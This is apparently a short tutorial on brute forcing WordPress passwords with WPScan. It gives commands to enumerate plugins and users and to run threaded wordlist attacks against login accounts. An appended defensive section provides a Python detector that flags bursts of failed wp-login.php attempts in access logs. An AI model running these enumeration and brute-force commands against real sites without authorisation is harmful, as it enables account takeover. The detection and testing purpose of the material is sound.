
Web Application Analysis



Today I want to share with you a very simple tutorial on how to brute force passwords on a WordPress system.

The tool we will be using today is WPScan; I am using Backtrack 5 KDE 32bit for this tutorial.


Introduction

WPScan is a black box WordPress security scanner written in Ruby. The primary function of WPScan is to find known security weaknesses within WordPress installations.

Let's begin:

1) On a terminal type: cd /pentest/web/wpscan/



2) Type in: ./wpscan.rb --url example.wordpress.com --enumerate p
When prompted, “Do you want follow the redirection ? [y/n] ” choose Y.



3) Thirdly, type in: ./wpscan.rb --url example.wordpress.com --enumerate u



4) Lastly, let's start brute forcing:

To brute force a single username:

./wpscan.rb --url  --wordlist <enter your wordlist> --username <Enter Username You want to Brute>

To brute force the enumerated users using 50 threads:

./wpscan.rb --url --wordlist <enter your wordlist> --threads 50



5) As you can see above, it is brute forcing the user I entered with 57046 passwords. This will take quite some time, so if your wordlist is bigger than 1 GB, I would advise you to split it up.
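
From the defending side, the threaded password guessing in step 4 appears in the web server access log as a burst of failed POSTs to wp-login.php from one client. The following is an added example, not part of the original tutorial or of WPScan: it assumes the Apache/nginx combined log format and stock WordPress behaviour (a failed login returns 200, a successful one redirects with 302); the function name, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def find_login_bruteforce(lines, max_attempts=5, window=timedelta(seconds=60)):
    """Return {ip: peak failed logins in one window} for clients with more
    than max_attempts failed wp-login.php POSTs inside a sliding window."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failed logins
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue              # malformed line, or not a login submission
        if not m["path"].split("?")[0].endswith("/wp-login.php"):
            continue
        if m["status"] != "200":  # assumption: 200 = form re-rendered = failure
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window: # drop attempts that fell out of the window
            q.popleft()
        if len(q) > max_attempts:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def _line(ip, hms, method, path, status):
    return (f'{ip} - - [10/Oct/2023:{hms} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 1234 "-" "-"')

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = (
    [_line("203.0.113.7", "13:55:00", "GET", "/wp-login.php", 200)]
    + [_line("203.0.113.7", f"13:55:{s:02d}", "POST", "/wp-login.php", 200)
       for s in range(8)]                      # 8 failures in 8 seconds
    + [_line("198.51.100.20", "13:50:00", "POST", "/wp-login.php", 200),
       _line("198.51.100.20", "13:52:00", "POST", "/wp-login.php", 200),
       _line("198.51.100.20", "13:52:30", "POST", "/wp-login.php", 302)]
)

if __name__ == "__main__":
    for ip, peak in find_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {peak} failed logins within 60s")
```

The same per-client counter is what a rate limit or temporary lockout on wp-login.php enforces; the user who mistypes a password twice and then logs in stays below the threshold.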
